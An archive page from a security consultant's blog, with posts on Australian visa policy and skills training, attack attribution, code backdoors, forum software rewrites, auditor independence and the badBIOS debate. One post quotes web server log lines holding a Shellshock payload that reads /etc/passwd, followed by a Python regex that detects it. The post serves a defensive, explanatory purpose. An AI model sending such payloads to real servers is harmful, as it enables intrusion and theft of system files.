Category: Security

  • Training the next generation, or the abolition of the Australian 457 visa

    Without consultation or warning, the Australian Government has decided to abolish the speciality skilled migration 457 visa system.

    There is a great deal of confusion, but the current plan seems to involve two skills shortage lists, each eligible for a different length of temporary stay and a different migration outcome:

    • The Short-Term Combined Skills Shortage list includes IT security professionals (ANZSCO code 262112). Folks sponsored under this list are eligible for a two-year visa and must then return home. This visa category leads neither to permanent residency nor to eventual citizenship.
    • The Medium and Long-term Strategic Skills List allows 457 visas to be granted for four years. As this category stands today (20th April 2017), the list has no IT security professional category, despite our industry lacking tens of thousands of workers. Migrants employed under this skills list can progress to permanent residency and eventual citizenship.

    As a profession, we have been overlooked. Abandoned, even. IMHO, with this change, Australia is being cut off from the world without adequate notice. We haven’t planned for this, and so it’s going to be chaotic and an extremely tight market for a while as we transition to not being able to hire immigrant workers.

    Where to start? Well, in the olden days, folks with an interest in security sort of fell into it. Back then, it was the wild west. It could easily end up that way again. I think we can do better, but we need to address the skills pipeline, starting with universities turning out rounded students who have a deep, holistic understanding of many areas of IT security, not just one small element of it.

    It’s difficult to hire juniors today. They exist, but the problem is that clients often expect the “A” team, and will ring you up after a gig if they are unhappy with a consultant for whatever reason and ask that they don’t return. After a few of those calls, we’re in deep scheduling doo-doo. We do take the opportunity to learn from these calls, but it can be risky to hire someone who might have talent but needs more experience. Soon, we will have no choice, and clients will have no choice but to accept juniors and fee rises as we increase the use of shadowing.

    In the past, the ever-downward pressure on fees made it difficult to allow shadowing, which is the usual way of imparting knowledge on the job. It’s inappropriate to send in folks who can take out a client’s network or application without realising it. The Dunning-Kruger effect in IT security is particularly harsh, and it can end your career if you’re not protected. It’s a difficult lesson to learn, and the best people learn the most in the hardest possible way. The only way to minimise this risk is adequate early training and shadowing for at least 6-12 months. And even then, there will still be mistakes.

    The lack of juniors is a curse on our industry today – we let it get like this, firstly by allowing clients to choose consultants rather than the team, and secondly, by not taking chances on juniors and understanding that for a couple of years, they will need to be shadowing someone before it’s safe to let them take on a job by themselves.

    We created this skills shortage by not demanding that our universities produce adequately rounded graduates onto whom we could then layer industry needs, like sound consulting behaviours, people soft skills, and writing skills.

    Australian universities do not offer many degrees in IT security. Those that do offer units here and there, or, if they offer a major stream (and a few do, like UNSW), concentrate on what I affectionately call “ethical hacking” rather than the full suite of our profession. I applaud the fact that at long last we are seeing some IT security majors, but the subject matter leaves a great deal to be desired. Universities aren’t vocational schools, and yet many are pumping out vocationally trained individuals. As an industry, we need both rounded and vocationally trained graduates, with life-long learning beaten into them and a healthy start on the ol’ Dunning-Kruger curve.

    Folks from these degrees often need a lot of training to get them client ready, so again, I think we need to work with higher education to produce fewer hackers and more security professionals, with a depth of skills across the IT security spectrum that will stand the test of their entire career, rather than for example folks with good CTF skills or the ability to deep dive into X86 reverse engineering.

    We need to engage with the University sector to get new degrees going in 2018, and for them to aggressively recruit new students as a matter of priority, covering:

    • Governance, risk and compliance
    • Identity and access management
    • Privacy and data protection
    • Enterprise and Cloud Security Architecture
    • SSDL and Secure coding
    • Application and mobile security
    • Systems and DevOps Security
    • Defences against the dark arts (Blue team)
    • Red teaming (ethical hacking)
    • DFIR, and malware analysis
    • Managing security – BAU IT Security Management and CISO
    • Critical Infrastructure Security (OT security, SCADA security, etc)

    We will have to concentrate on the more esoteric and necessary fields later, such as IoT security and embedded systems.

    We have less than two years to graduate students through a three year undergraduate program that does not exist today, employ them as juniors, and train them in what we do.

    I’ve said many times I can take a developer and turn them into a security pro in relatively short order (3-12 months max), but I cannot teach three years of programming to a security pro.

    For a while, I fully expect the current 0% unemployment rate in our field to become negative unemployment, with out-of-control wage growth as fewer folks are around to fulfil an ever-increasing number of FTE requirements. Security consultancies might need to work together to share staff or similar; I’m sure there will be consolidation of consultancies and friendly alliances. I also bet there will be opportunistic recruiters setting up consultant farms to help folks get the best price in a really tight market. Good for them, market forces working for everyone.

    As a global Board member of OWASP (speaking in a personal capacity), I can help bring together experts in application security and drive those syllabuses in SSDL, secure coding, and application and mobile security, which are critical skills for nearly all firms that produce software and security boutiques alike.

    I call on the Universities, ACSC, AISA, OWASP, and lastly ACS to lead this charge and to engage with higher education to start the process. We must work together as an industry and higher education to build out these many syllabuses, and get the word out to prospective Uni students that IT security is a great field with immense prospects.

    The imminent abolition of IT security immigrant visas is both terrifying and exciting, because finally, we don’t have any choice – the entire lifecycle of our industry has to grow up and REALLY fast.

  • The intelligence kimono

    Some of my IR and forensics friends, whom I highly respect, are getting all bent out of shape about attribution, or the perceived lack of solid evidence for attribution regarding the DNC attacks. In particular, many of them are now publicly doubting on social media (and in mainstream media) that Russia is behind the DNC hacks.

    When the Guccifer 2.0 posts came out, this same set of folks analyzed the dump, and pretty much everyone in Twitter IR land was convinced the dump came from Russian intelligence services, and that the Guccifer 2.0 persona was a Russian intel front. Go back and check for yourself; it’s easy to do if you know the usual suspects.

    IR and forensics is not my field, so I didn’t really comment at the time, nor really now, except to repeat “attribution is hard, why bother” (particularly relating to attributing to China, which was the previous most common attribution target).

    Why bother with attribution?

    Because it gets press. Attribution is simply not that useful for the average organisation trying to protect their data … unless they need to take it to court, or you’re a nation state and you want to know who attacked you. Then it becomes vital that it is done properly, and only a few can do this well.

    Realistically, my field is protecting information. I find it frustrating when the cyclical fads in our industry lean towards the fatalistic “you’re already hacked, so let’s only detect and respond”, which has been going for nearly three years already, two years longer than I expected. It must be making money for someone, or it seems like security is finally doing a good job, when in fact we’re only fighting fires, not constructing fireproof artefacts out of flame-retardant materials.

    If we don’t start work on protecting information BY DEFAULT, we will always be fighting fires, and the world will be on constant fire. That’s crap. We can and should do better than that.

    I specialize in helping clients, and anyone who consumes my standards work, to protect themselves. Building security in costs far less than bolting it on afterwards, and it should be the default choice as it’s the most economical investment.

    When I help clients protect information, I like to learn how folks in their industrial sector are attacked, so I am very interested in tools, techniques and practices, and to some extent “why” they did it, but I simply don’t need to know who did it. It’s just not relevant.

    So I don’t invest in attribution because it is so ridiculously hard to get to a level that would stand up to scrutiny in court. I have colleagues who can do that, but the time and effort taken … well, if your attacker turns out to be a nation state, what are you realistically going to do about it? The same things I am already suggesting you do.

    We’re not behind the intelligence kimono

    The problem is simple: security agencies with more access than mere mortals don’t share what’s behind the intelligence kimono. Folks outside the kimono either have to trust intelligence agencies on face value, or … you have to state “I don’t personally know, but my opinion is that the evidence is not strong”.

    It’s perfectly fine, and indeed I would expect, for my experienced IR and forensic friends to call for a better job of presenting evidence to justify a particular conclusion without compromising state secrets.

    But to state strongly, without any more evidence than has been released, that “It’s country X or Head of State Y” or “There’s no direct evidence, so it’s not Country X or Head of State Y” is at the very least over-egging it, and almost certainly wrong. But due to the intelligence kimono, we can’t say for sure.

    Intelligence agencies, from my understanding, rarely state things in black and white terms, but present arguments based on analysis of available (classified) information. So for the person in the street looking for an easy “It was Country X or Head of State Y”, well, that’s unlikely ever to exist.

    What can we take away from this?

    Please go easy when making public statements, particularly where we muddy the waters. Understand that there are unknown unknowns, and unless you’re on the inside of the intelligence kimono, those unknown unknowns mean we can’t advocate strongly one way or another.

    I do hope that intelligence agencies trying to brief the public on classified matters realize that the IT security field contains many awesome subject matter experts, who will peer review your work for free, either for you or in the media.

    Releasing under-cooked or simply wrong reports is counterproductive. It would be worthwhile to bring in those with a strong IR capability to help create public documents that stand the scrutiny of my dedicated and talented peers.

    To my dedicated and talented IR and forensic industry peers: please don’t go “It’s not X” in the media and all over social media. Unless you are inside the intelligence kimono, you have no more information than I do, unless someone is blabbing inappropriately. Please work to help government agencies do a better job instead of saying something you can’t prove any more than I can, even with your additional expertise.

    In the meantime, let’s not start down the path of distrusting expertise. That way lies failure.

  • On backdoors and malicious code

    So since ASVS 3.0 retired many of the malicious code requirements, and after actually doing a line-by-line search of ~20 kLOC of dense J2EE authentication code, I’ve been thinking about the various ways backdoors might be created yet remain unfindable by both automated and line-by-line searches.

    This obviously resonates with the recent Juniper revelation of a backdoor found in the VPN code of their SOHO device firmware. It also feels like the sort of thing Apple suffered with GOTO FAIL, and that Linux suffered a long time ago with the wait4 backdoor attempt.

    https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

    So basically, I’ve been thinking that there obviously has to be a group dedicated to obfuscated backdooring: making code that passes the visual and automated muster of specialists like me. There is probably another group, or a portion of the same group, that sets about gaining sufficient privileges to make these changes without being noticed.

    So before anyone goes badBIOS on me, I think it would be useful if we started to learn what malicious coding looks like in every language likely to be backdoored.

    We can help prevent these attacks by improving the agile SDLC process and keeping closer tabs on our repos. We can also make these attacks much harder to slip in if folks stick to an agreed formatting style, primarily by using automated indentation and linting that detects missing block braces and assignments inside conditionals. Yes, this will make some code visually longer, but we cannot tolerate more backdoors.

    I’ve been doing a LOT of agile SDLC security work in the last few years, working WITH the developers on creating actually secure development processes and resilient applications, rather than reviewing the finished product and declaring their babies ugly. The latter does not work. You cannot review your way to building secure applications. We need to work with developers.

    This is important as we’re starting to see an explosion in language use. It’s not merely enough to understand how these things are done in C or C++, but in any system language and any up-and-coming language, for many of which we have zilch, nada, nothing in the way of automated tools, code quality tools, and specialists familiar with Go, Clojure, Haskell, and any number of other languages I see pop up from time to time.

    What I think doesn’t work is line-by-line reviewing. All of these pieces of code must have been looked at by many people (the many eyeballs fallacy) and run past a bunch of automated source code analysis tools, and it was “all good”, but it wasn’t really. Who knows how many secure code review specialists like me looked at the code? We need better knowledge and better techniques that development shops can implement. I bet we haven’t seen the last of Juniper-style attacks. Most firms are yet to really look through their unloved bastard repos, full of code from developers past and present.

  • Time to start rebuilding GaiaBB

    In a life a long time ago, in early 2002, we had to move Australia’s largest Volkswagen car forum from EzyBoard, which was serving our users malicious ads and hard-to-dismiss pop-ups, to our own forum software. After a product selection, I chose XMB, which was (and is) better than the other free forums out there, such as phpBB (which didn’t have attachments until v3.0!), and others.

    XMB was a good choice as it had so many features. What I didn’t know is that XMB was full of security holes. XMB started life as a two week effort by a then 14 year old, who had limited capabilities in writing secure software. If you looked at the OWASP Top 10 and XMB, XMB had at least one of everything. We had XSS, we had SQL injection, we had access control problems, we had authentication bypass, we had … you name it, we had it. Boards were being pwned all over. So I started to help XMB, and soon became their security manager.

    The story of XMB’s rise and fall is long and complicated, with many machinations over its history. There were multiple changes of lead developer, at least one of which I caused, something I’m not proud of and which realistically covered no one in glory. The original 14-year-old was pushed out before I got there, and there were various stories floating around, but one of the interesting outcomes is that a company came to think it owned a free software project. I pushed to have our software adopt the GPL, which was accepted at the time, and it’s the only reason that XMB and all its forks, including GaiaBB, have lasted to this day.

    XMB was forked relentlessly, being the basis of MyBB and OpenBB, as well as UltimaBB and then GaiaBB. The late 2000s were not friendly to XMB, with not only the loss of the main development system but also a change of “ownership” causing many rifts. Then there was another failed fork called UltimateXMB, which started as a mod central for XMB but turned into a fully customised version of XMB like UltimaBB, though closer in database schema to XMB itself. The last fork of XMB, XMB 2, was a last-ditch effort to stop it dying, but it failed as well when the last “owner” of XMB decided to use DMCA takedown requests, which was illegal, as I owned the copyright on many of the files in XMB, as did others, particularly John Briggs and Tularis. That last remnant of the one true tree of XMB can be found at XMB Forum 2.

    In 2007, I forked XMB with John Briggs, creating UltimaBB. Life was good for a while; we had momentum, and it worked better than XMB during those years. After the loss of the XMB master SVN tree, XMB 1.9.5 was resurrected as effectively a reverted version of UltimaBB. Then life changed for me, with a move to the US and having a child, so we parted ways, which was sad for me at the time, as I knew what would happen without a strong and active lead developer. Eventually UltimaBB withered too. I had to fork UltimaBB, creating GaiaBB, as I needed to keep my car forum Aussieveedubbers alive and secure.

    GaiaBB got only just enough love to keep it secure, but it hasn’t kept up. It barely functions on PHP 5.6, and modern browsers render it funny. Given the technical debt baked into code originally written by a 14-year-old (header.php and functions.php are both monolithic and stupidly long), it’s time to call time on it.

    So I need to start over or find something new for my forum. As I need to keep my skills up with the modern kids writing software today, I’ve decided to make the investment in re-writing the software so I can learn about modern Ajax frameworks and have a go at writing back-end code. No small part of this is that I want to learn about the security measures as a developer: as a code reviewer and penetration tester, you can’t talk to developers unless you know how applications are built and tested, and all the compromises that go into making applications actually run.

    GaiaBB

    So let’s talk about GaiaBB. Compared to most PHP forum software, it’s pretty secure. It’s got all the features you would ever need, and then a lot more on top of that. But it’s a spaghetti nightmare. It needs a total re-write. It’s not responsive design in any shape or form; mobile users just can’t use it. There are heaps of bugs that need fixing. There’s no test suite. Database compatibility is not its strong point.

    Frontend decision – Polymer

    After looking around, I’ve decided that the front end shall be Polymer as it has good anti-XSS controls and is rapidly evolving. It does responsive design like no one’s business. And because Polymer hasn’t got the cruft of some of the alternatives it will make me think harder about the UI design of the forum software.

    Back in the day, we crammed as many pixels and features into a small space because that was the thing then. Nowadays, it’s more about paring back to the essentials. This is critical for me as I don’t have the time to put back EVERY feature of GaiaBB, but as I know most features are never used, that’s not a big deal.

    Backend considerations

    Now, I need to choose a back end language to do the re-write. My requirements are:

    • Must be workable on as many VPS providers as possible, as many do not provide a way to run non-PHP applications without difficulty
    • Must be fast to develop, so I am not interested in enterprise-style languages that require hundreds of lines of cruft where one line is actually required
    • Must support a RESTful API
    • Must support OAuth authentication, as although I can write an identity provider, I am more than willing to allow forum owners to integrate our identity with Facebook Connect or Google+
    • Must have an entity framework for data access. The days of writing SQL queries are done; I want database transparency
    • Must support writing automated unit and integration tests. This is not optional

    So far, I’ve looked at various languages and frameworks, including:

    • PHP. OMG the pain. There are literally no good choices here. You’d think that because I have a lot of the business logic already in PHP this would be a no-brainer, but the reality is that I have terrible code that is untestable.
    • Go. A very interesting choice, as it’s a system language that explicitly supports concurrency and all sorts of use cases. However, it does not necessarily follow that writing backend code in Go is the way to go, as I’ve not found a lot of examples that implement RESTful web services. It’s possible, as it’s a system language, but I don’t want to be the bunny doing the hard yards.
    • Groovy and Grails. I have clients who use this, so I am interested in learning the ins and outs, as it seems pretty self-documenting and fast to write. It runs on the JVM.
    • Spring. Many clients use this, but I do not like how much glue code Java makes you write to do basic things. Patterns implemented in Spring seem to take forever to provide a level of abstraction that is not required in real life. I want something simpler.

    Frameworks I will not consider

    The few remaining XMB, UltimaBB, and GaiaBB forums need to be migrated to something modern, and that requires support. I don’t have time for support, so I am going to exclude a few things now.

    • Python / Django. I don’t write Python. Few clients use it and I don’t want to be figuring out or supporting a Python web service layer.
    • Node.js. I know this was hot a few years ago, but seriously, I need security, and writing a backend in something that does not protect against multi-threaded race conditions is not okay.
    • Ruby on Rails. I thought about this for a bit, but honestly, I’ve never had to review a Ruby on Rails application, so re-writing my business logic and entities in it would not give me more insight than using Groovy/Grails, which I do have clients using.

    At the moment, I’m undecided. I might use Groovy/Grails, as it’s literally the simplest choice so far and supports exactly what I want to do. That said, Groovy/Grails is starting to lose corporate backing, and I don’t want to use a language that might end up on the scrapheap of history.

    What would you do? I’m interested in your point of view if you’ve done something interesting as a RESTful API.

  • Looking back at 2009 and Predictions for 2015

    I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that besides the dramatic increase in mobile assessments this last year or two, the things I was banging on about in 2009 are still issues today:

    Developer education is woeful. I recently did an education piece for a developer crowd at a client, and only two of 30 knew what XSS was, and only one of them was aware of OWASP. At least at a University event I did later on in the year, about 20% of the students were aware of OWASP, XSS, SQL injection and security. The other 80% – not so much. I hope I reached them!

    Agile security is woeful. When agile first came out, I was enthralled by the chance for an SDLC to be secure by default because they wrote tests. Unfortunately, many modern-day practitioners felt that all non-functional requirements were in the category of “you ain’t gonna need it”, and so the state of agile SDLC security is just abysmal. There are some shops that get it, but this year I made the acquaintance of an organisation that prides itself on being agile thought leaders, who told our mutual client they don’t need any of that yucky documentation, up-front architecture or design, or indeed any security stuff, such as constraints or filling in the back of the card with non-functional requirements.

    Security conferences are still woeful. Not only is there a distinct lack of diversity in many conferences (zero women speakers at Ruxcon for example), very few have “how do we fix this?” talks. Take for example, the recent CCC event in Berlin. The media latched onto talks about biometric security failing (well, duh!) and SS7 insecurity (well, duh! if you’ve EVER done any telco stuff). Where are the talks about sending biometrics to the bottom of the sea with concrete shackles or replacing SS7 with something that the ITU hasn’t interfered with?

    Penetration testing still needs to improve. I accept some of the blame here, because I was unable to change the market: pen tests still sell really well. We really need to move on from pen tests as a wasted opportunity cost for actual security. We should be selling hybrid application verifications: code reviews with integrated pen tests to sort out the exploitability of vulnerabilities properly. Additionally, there’s a race to the bottom of the barrel, with folks selling 1-2 day automated tests as equivalent to a full security verification for as little money as they can. We need a way of distinguishing weak tests from strong tests so the market can weed out useless checkbox testing. I don’t think red teaming is the answer, as it’s a complete rod-length check that can cause considerable harm unless performed with specific rules of engagement, which most red team folks would think invalidates a red team exercise.

    Secure supply chains are still an unsolved problem. No progress at all since 2009. Liability law holds the unique position that software, unlike all other goods and services, is somehow special and needs special protection. That might have been true back in the 70s during the homebrew days, but it’s not true today. We are outsourcing and out-tasking more and more every day, and unless suppliers are required to uphold the standard fit-for-purpose rules that all other manufacturers and suppliers must, we are going to see more and more breaches and end-of-company events. Just remember: you can outsource all you like, but you can’t outsource responsibility. If managers are told “it’s insecure” and take no or futile steps to remediate it, I’m sorry, but those managers are accountable and liable.

    At least, due to the rapid adoption of JavaScript frameworks, we are starting to see a decline in traditional XSS. If you don’t know how to attack responsive JSON or XML API-based apps and DOM injections, you are missing out on new-style XSS. Any time someone tells you that security is hard to adopt because it requires so much refactoring, point them at any responsive app that started out life a long time ago: there’s way more refactoring in changing to responsive design and a RESTful API than in adding security.

    Again, due to the adoption of frameworks such as Spring MVC and so on, we are starting to see a slight decline in the number of apps with CSRF and SQL injection issues. SQL injection used to affect about 20-35% of all apps I reviewed in the late 2000s, and now it’s fairly rare. That said, I had some good times in 2014 with SQL injection.

    The only predictions I will make for 2015 are a continued move to responsive design using JavaScript frameworks for web apps, a concerted movement towards mobile-first apps, again with a REST backend, and an even greater shift towards cloud, where there is no perimeter firewall. Given the lack of security architecture and coding knowledge out there, we really must work with the frameworks, particularly those on the backend like node.js, to protect front-end web devs from themselves. Otherwise, 2015 will continue to look much like 2009.

    So the best predictions are those you work on to fix. To that end, I was recently elected by the OWASP membership to the Global Board as an At Large member. And if nothing else – I am large!

    • I will work to rebalance our funding. Rather than delivering most of OWASP’s funds directly back to members, who pay a membership fee and then often don’t spend their allocated chapter funds, we should focus on building OWASP’s relevance and future by spending around 30% on our projects, standards, and training, 30% on outreach, 30% on membership, and 10% or less on admin overheads.
    • I will work towards ensuring that we talk to industry standards bodies and deal OWASP into the conversation. We can’t really complain about ISO, NIST, or ITU standards if they don’t have security SMEs to help draft these standards, can we?
    • I will work towards redressing the diversity both in terms of gender and region in our conferences, as well as working towards creating a speaker list so that developer conferences can look through to provide invited talks to great local appsec experts. We have so many great speakers with so much to say, but we have to get outside the echo chamber!
    • We have to increase our outreach to universities. We’ve lost the opportunity to train the folks who will become the lead devs and architects in the next 5-10 years, but we can work with the folks coming behind them. Hopefully, we can also invest time and effort into reaching those already in the industry in senior/lead developer, architect, and business analyst roles, but in terms of immediate bang for buck, we really need to move university-level education beyond the few “ethical hacking” courses (which are trade qualifications) and work on building security knowledge into the software engineers and comp sci students of the future. Ethical hacking courses have a place … for security experts, but for coders they are a complete waste of time. Unless you are doing offensive security as your day job, software devs do not need to know how to discover vulnerabilities and code exploits, except in the most general of ways.

    It’s an exciting time, and I hope to keep you informed of any wins in this area.

  • Independence versus conflict of interest in security reviews

    I was giving a lecture to some soon to be graduating folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”.

    No, it’s not. And here’s why.

    Conflict of interest

    It’s only conflict of interest if a developer who wrote the code then reviews the code and declares it free of bugs (or indeed, is honest and declares it full of bugs). In either case, it’s self review, which is a conflict of interest.

    The only way the auditor has a conflict of interest is if the auditor reviews code they themselves wrote. That is self-review.

    An interesting corner case that requires further thought is a rare case indeed: I wrote or participated in a bunch of OWASP standards, some of which became parts of other standards and certifications, such as PCI DSS section 6.5. Am I self-reviewing if I review code or applications against these standards?

    I think not, because I am not changing the standard to suit the review (which would be an independence issue), and I’m not reviewing the standard itself (which would be self-review, and thus a conflict of interest).

    Despite this, where I think an independence-in-appearance issue might arise, I always disclose that I created or had a hand in these various standards, especially if I recommend that a client use a standard I helped write.

    Independence

    Independence is not just an empty word, it’s a promise to our clients that we are not tied to any particular vendor or methodology. We can’t be a trusted advisor if we’re a shill for a third party or are willing to compromise the integrity of review at a customer’s request.

    The usual definition of independence is two-pronged:

    • Independence in appearance. Someone might think you are compromised because of affiliations or financial interests, such as a previous job. For example, if you’ve always worked for incident response tool vendors and then move to a security consultancy, you might feel you are independent, but others might perceive you as having a pro-IR-toolset point of view.
    • Independence in actuality. If you own shares in a product or get a financial reward for selling it, any recommendation you make about that product is suspect. This is the reason I want OWASP to remain vendor neutral.

    If either of these prongs is violated, you are not independent. But just as humans are complex, there are many aspects to independence, and I’ve not learnt them all. I know most of the issues: been there, got the t-shirt.

    There are a few areas of independence that I refuse to relinquish (and I hope you do too!):

    • Scoping questions. I don’t mind customers setting a scope, but I will often argue for the correct scope before we start. Too narrow a scope can railroad a review into giving an answer the client wants, rather than a proper independent review.
    • Review performance independence. If the client tries to make the review so short that I can’t complete my normal review program effectively, stops me from getting the information I need, or tries to frame negative observations in a lesser or “meh” context, I will resist. I want the review to be accurate, but not at the expense of my methodology or my usual standards.
    • Risk ratings and findings. In the last few years, I’ve had to resist folks trying to force real findings to become unrated opportunities for improvement (by definition, all of my findings are opportunities for improvement), or trying to argue down risk ratings, or getting words changed to suit a desired outcome. Again, I want the context to be accurate and I will listen to your input and arguments, but only I will write the report and set the risk ratings. Otherwise, why bother hiring an external reviewer? You could write your own report and set the ratings to suit. It doesn’t work that way.

    Does independence always need to be achieved?

    My personal view on this has changed over the years. I used to toe the strict party line on independence.

    However, sometimes as a reviewer, you can be part of the solution. I personally believe that a good working relationship between the reviewer and the folks who produced the application or code is a good thing. Both parties can learn from working closely together, work out the best approach to resolving issues, and test it rapidly.

    As long as the self-review aspect is properly managed, I believe this to be a good path forward. I don’t see it as any different from a traditional review that recommends fix X and then verifies that X has been put in place. However, if the auditor is editing code, a line has been crossed.

    Work with the business to document agreed rules of engagement prior to work commencing. Both parties will get a lot more mileage from a closely cooperative review than from the “pay someone to sit in the corner for two weeks” engagement that is the standard fare of our industry.

    Conclusion

    Working together has obvious independence issues, particularly from an appearance point of view. So, to the excellent question from a student today: working closely with the auditors is not a conflict of interest, but it can be an independence issue if not properly managed by both the business and the reviewer.

  • Some people don’t get the hint

    85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1” 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd”
    85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1” 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd”

    Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.
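    For readers wondering what those log lines are: the User-Agent field carries the classic Shellshock (CVE-2014-6271) payload, a bash function definition `() { ...};` followed by commands that a vulnerable CGI setup would execute. A minimal sketch of scanning an access log for the signature might look like this (the combined-log-format field positions and the function name are my assumptions, not anything from the original post):

    ```python
    import re

    # Shellshock probes embed a bash function definition, "() {",
    # in a header that may be copied into an environment variable.
    SHELLSHOCK = re.compile(r'\(\)\s*\{')

    def shellshock_hits(log_lines):
        """Return (ip, payload) pairs for combined-format log lines
        whose User-Agent (the last quoted field) matches the signature."""
        hits = []
        for line in log_lines:
            fields = re.findall(r'"([^"]*)"', line)  # all quoted fields
            if fields and SHELLSHOCK.search(fields[-1]):
                ip = line.split()[0]  # client IP is the first token
                hits.append((ip, fields[-1]))
        return hits
    ```

    Run against the two entries above, this flags 85.25.242.250 both times; feeding the hits to a blocklist or an abuse report is left as an exercise.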

  • So it’s finally happened

    Passwords. Pah.

    After running my blog on various virtual hosts and VPSs since 1998, the measures I put in place to protect this site and the others hosted here turned out to be insufficient to protect against weak passwords.

    Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational security. There will be consequences. That is not a threat.

  • AppSec EU – DevGuide all day working party! Be a part of it!

    Be a part of the upcoming AppSec EU in Cambridge!

    Developer Guide Hackathon

    * UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. *

    Eoin Keary and I will be running an all-day working party on the Developer Guide on June 24 from 9 AM to 6 PM GMT. The day starts with Eoin giving a DevGuide status update talk, and then we get down to editing and writing.

    I will be working remotely from the end of Eoin’s talk until 1 pm UK time, so I encourage everyone who has an interest in the DevGuide to either attend the workshop in person or consider helping out remotely. Sign up here!

    https://www.owasp.org/index.php/Projects_Summit_2014/Working_Sessions/004

    My goal is to get the entire text of the OWASP Developer Guide 2.0 ported to the new format at GitHub, and hopefully finish 4 chapters. To participate, you will need a browser and a login to GitHub. You will also probably want a Google+ login so you can join an “on air” all-day hangout, ask me anything about the DevGuide, or just chill with other remote participants.

  • Stop. Just stop.

    In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr), has stuck his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is that the chorus of “It’s not real”, “It’s impossible”, “It’s fake” is becoming overwhelming without sufficient evidence one way or the other. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or the other?

    My issue is not “is it true” or “I think it’s true” or “I think it’s false”; it’s that so many infosec “professionals” are basically claiming:

    1. Because I personally can’t verify this issue is true, the issue must be false. QED.

    This fails Logic 101 (class 1), and the scientific method as well.

    This is not a technical issue, it’s a people issue.

    We must support all of our researchers, particularly the ones who turn out to be wrong. This is entirely obvious: if we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly, “I think X is a fool for thinking that his computers are suspect”. This is utterly wrong and foolhardy, and it serves the clickbait articles the journalists write and their news cycle, not us.

    Not everybody is a viable candidate for having the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security and budget to brick and then utterly destroy at least two (or twenty) computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to need the electronic equivalent of a PC4 bio lab. Most labs are not PC4, and I bet most infosec computing labs are nowhere near capable of hosting this sample.

    Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together: pulling together electronic engineering folks with the sort of expensive equipment only a well-funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

    We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias; we must rule out “well, a $0.10 audio chip paired with a $0.05 speaker will do that, and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and its lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

    We must allow sufficient time for the researchers to collaborate, arrive at either a positive or a negative result, analyse their findings, and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24-hour news cycle is their problem, not ours. We have Twitter, Google Plus, and conferences. Have some respect and wait a little before running to the nearest journalist “friend” and bleating “It’s an obvious fake”.

    We owe a debt to folks like Dragos who have odd results, and who are brave enough to report them publicly. Odd results are what push us forward as an industry; cryptanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen next time. What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

    Our industry’s story is not the story of the little boy who cried wolf. We are (or should be) more mature than a child’s fable. Have some respect for our profession, and work with researchers rather than sullying their name (and yours and mine) by announcing, before you have proof, that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened: I try every trick in the book, including the bleeding-edge stuff, as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, it’s either sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet that few of us could have gotten as far as Dragos has.

    To me, we must step back and work together as an industry. Ask Dragos: “What do you need?” “How can we help?” And if the answer is “Give me time”, then let’s step back and give him time. If it’s a USB circuit analyser, or a microcontroller dev system plus some mad soldering skills, well, help him rather than tear him down. Dragos has shown he has sufficient operational security to research this for another 12-24 months. We don’t need to know now, now, or now. We gain nothing by trashing his name.

    Just stop. Stop trashing our industry, and let’s work together.